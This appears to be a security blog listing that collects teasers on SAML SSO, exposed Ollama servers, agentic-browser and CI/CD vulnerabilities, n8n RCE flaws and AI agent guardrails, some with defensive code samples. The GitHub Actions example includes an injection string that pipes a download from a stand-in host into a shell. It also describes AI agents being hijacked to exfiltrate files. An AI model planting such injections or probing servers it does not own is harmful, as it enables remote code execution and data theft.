
Joomla SAML SSO with Salesforce | Step-by-Step SAML SP Setup Guide

Stop managing separate passwords! In this comprehensive tutorial, we’ll show you how to configure SAML Single Sign-On (SSO) for Joomla using Salesforce as your Identity Provider (IdP). By the end, your users will be able to log in to your Joomla site securely using their Salesforce credentials, creating a frictionless enterprise experience.
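At its core, the setup is an exchange of identifiers and endpoints: Salesforce needs your Joomla site's Service Provider (SP) values, and Joomla's SSO plugin needs Salesforce's IdP values. A minimal sketch of that mapping follows; every URL is a placeholder (the ACS path and the My Domain hostname are hypothetical, and your SSO plugin and Salesforce org display the real ones):

```python
# All values are placeholders; copy the real ones from your Joomla SSO
# plugin's SP settings screen and from Salesforce's Identity Provider
# setup page (or its downloadable IdP metadata XML).
saml_mapping = {
    # Service Provider (Joomla) values you register in Salesforce:
    "sp_entity_id": "https://joomla.example.com",
    "sp_acs_url": "https://joomla.example.com/saml/acs",  # hypothetical ACS path
    # Identity Provider (Salesforce) values you enter in Joomla:
    "idp_entity_id": "https://yourorg.my.salesforce.com",
    "idp_sso_url": "https://yourorg.my.salesforce.com/idp/endpoint/HttpRedirect",
    "idp_x509_cert": "<certificate from the Salesforce IdP metadata XML>",
}

# Sanity check: every SAML endpoint must be served over HTTPS, or the
# assertion exchange is open to interception.
for key in ("sp_entity_id", "sp_acs_url", "idp_entity_id", "idp_sso_url"):
    assert saml_mapping[key].startswith("https://"), key
```

Whatever plugin you use, the same five values appear under different labels; the certificate is what lets Joomla verify that assertions really came from your Salesforce org.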

Discover Exposed AI Infrastructure with Indusface WAS

You track your web applications. You inventory your APIs. But is anybody monitoring your AI servers? Just last week, research found more than 175,000 exposed instances of Ollama, an AI server popular for self-hosting LLMs. Across enterprises, self-hosted model servers are being deployed on cloud VMs and GPU-backed instances to power copilots, internal automation, and experimental AI features.
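The exposure stems from Ollama's defaults: it serves an unauthenticated HTTP API on port 11434, and a GET to /api/tags lists the installed models. A minimal sketch of how a defender might check their own hosts; the helper names and the sample body are illustrative, and this is a classifier, not a scanner — probe only assets you own:

```python
import json

OLLAMA_DEFAULT_PORT = 11434  # Ollama's default listen port

def probe_url(host: str, port: int = OLLAMA_DEFAULT_PORT) -> str:
    """URL of Ollama's unauthenticated model-listing endpoint."""
    return f"http://{host}:{port}/api/tags"

def looks_like_ollama(body: str) -> bool:
    """Heuristic: /api/tags answers with JSON holding a top-level
    'models' list, so a matching body suggests an exposed server."""
    try:
        data = json.loads(body)
    except ValueError:
        return False
    return isinstance(data, dict) and isinstance(data.get("models"), list)

# Example: a body that an exposed server would return
sample = '{"models": [{"name": "llama3:8b"}]}'
print(probe_url("203.0.113.7"))   # http://203.0.113.7:11434/api/tags
print(looks_like_ollama(sample))  # True
```

If any host you own answers this way from the public internet, bind Ollama to localhost or put it behind an authenticated reverse proxy.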

Why EDR isn't enough on its own

Editor's note: The following guest contribution is by Tanium Domain Architect Jim Kelly.

Think about your last security event. Was your team confident nothing was missed? Were there questions about where else the attacker could have left persistence? Most often we are left with uncertainty, and that uncertainty can show up in every serious incident. An alert fires, the SOC responds, and the immediate threat looks like it is contained.

PerplexedBrowser: Accepting a Meeting or Handing Your Local Files to an Attacker?

How a routine calendar invite enabled silent local file access and data exfiltration

Note: This post is part of a coordinated disclosure by Zenity Labs detailing the PleaseFix vulnerability family affecting the Perplexity Comet Agentic Browser. This blog focuses on browser-level autonomous agent execution and session compromise.

100 SaaS Apps. One Query. Zero Alerts: How Glean and Claude Cowork Expose the Agentic AI Data Risk

A sales rep opened Glean—an AI-powered enterprise search platform that connects to your company's SaaS apps and lets anyone query across all of them in natural language—typed "Who are my top 10 customers?" and got a clean, formatted list pulled from Salesforce, cross-referenced with HubSpot, and confirmed against data sitting in Google Drive. They copy-pasted that list into a personal Gmail draft. No alerts fired. No policies triggered. No one noticed. This isn't a hypothetical.

How JFrog's AI-Research Bot Found OSS CI/CD Vulnerabilities to Prevent Shai Hulud 3.0

Recent incidents have proven that Continuous Integration (CI) workflows are the new battleground for software supply chain attacks. Security pitfalls in GitHub Actions workflows, such as the unsanitized use of pull request (PR) data, can allow attackers to execute malicious code during CI runs, with devastating consequences.
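The unsanitized-PR-data pitfall has a canonical form: interpolating attacker-controlled fields like `${{ github.event.pull_request.title }}` directly into a `run:` step, where GitHub substitutes the value before the shell parses the script. A minimal sketch of the vulnerable pattern and the usual environment-variable mitigation (step names are illustrative):

```yaml
# Vulnerable: the PR title is substituted into the script text, so a
# title such as  "; curl https://evil.example/x | sh; echo "  runs
# attacker commands on the runner.
- name: Greet (unsafe)
  run: echo "New PR: ${{ github.event.pull_request.title }}"

# Safer: route untrusted input through an environment variable and
# quote it; the shell treats the value as data, never as code.
- name: Greet (safe)
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "New PR: $PR_TITLE"
```

The same pattern applies to PR bodies, branch names, and commit messages, all of which a third-party contributor controls.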

Four Critical RCE Vulnerabilities in n8n: What Cloud Security Teams Need to Know

Automation platforms sit at the center of modern infrastructure. They connect APIs, databases, CI/CD pipelines, SaaS tools, and internal systems. But when automation engines become compromised, the blast radius can be enormous. In February 2026, n8n, a widely used open-source workflow automation platform, disclosed four critical vulnerabilities that can lead to remote code execution (RCE) by authenticated users with workflow creation or editing permissions.

What to Look for in an AI Workload Security Tool: The Complete Buyer's Guide

You’re evaluating AI workload security tools and every demo looks the same. Vendor A shows you an AI-SPM dashboard. Vendor B shows you a nearly identical AI-SPM dashboard with slightly different branding. Vendor C shows you posture findings with an “AI workload” tag that wasn’t there last quarter.

Runtime Observability for AI Agents: See What Your AI Actually Does

Last Tuesday, a platform security engineer at a mid-size fintech company ran a routine audit on their production Kubernetes clusters. The audit surfaced three LangChain-based agents, two vLLM inference servers, and a Model Context Protocol (MCP) tool runtime. None had been reported by the development teams. None appeared in any security inventory. All had been running for weeks. One of the agents had been making outbound API calls to a third-party data enrichment service every four minutes.

Per-Agent Guardrails: How to Set Different Policies for Different AI Agents

You’ve deployed five AI agents into your production Kubernetes cluster: a customer support chatbot, a fraud detection agent, a data pipeline processor, a code generation assistant, and an internal summarization bot. Your security team writes one set of guardrails and applies them uniformly. Within a week, you discover the code generation agent needs interpreter access the chatbot should never have.
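The mismatch described above is what per-agent policy maps address: each agent gets its own allow-list instead of one uniform rule set. A minimal sketch in Python, with hypothetical agent and tool names; `GuardrailPolicy`, `POLICIES`, and `is_allowed` are illustrative, not any vendor's API:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class GuardrailPolicy:
    """Hypothetical per-agent policy: which tools the agent may invoke
    and whether it may open outbound network connections."""
    allowed_tools: frozenset
    allow_egress: bool

# One policy per agent instead of a single cluster-wide rule set.
POLICIES = {
    "support-chatbot": GuardrailPolicy(frozenset({"kb_search"}), allow_egress=False),
    "fraud-detector":  GuardrailPolicy(frozenset({"txn_lookup"}), allow_egress=False),
    "code-assistant":  GuardrailPolicy(frozenset({"interpreter", "repo_read"}),
                                       allow_egress=True),
}

def is_allowed(agent: str, tool: str) -> bool:
    """Deny by default: unknown agents and unlisted tools are blocked."""
    policy = POLICIES.get(agent)
    return policy is not None and tool in policy.allowed_tools

print(is_allowed("code-assistant", "interpreter"))  # True
print(is_allowed("support-chatbot", "interpreter")) # False
```

The deny-by-default lookup is the important design choice: the code-generation agent can hold interpreter access without that capability leaking to the chatbot, and a newly deployed agent gets nothing until someone writes its policy.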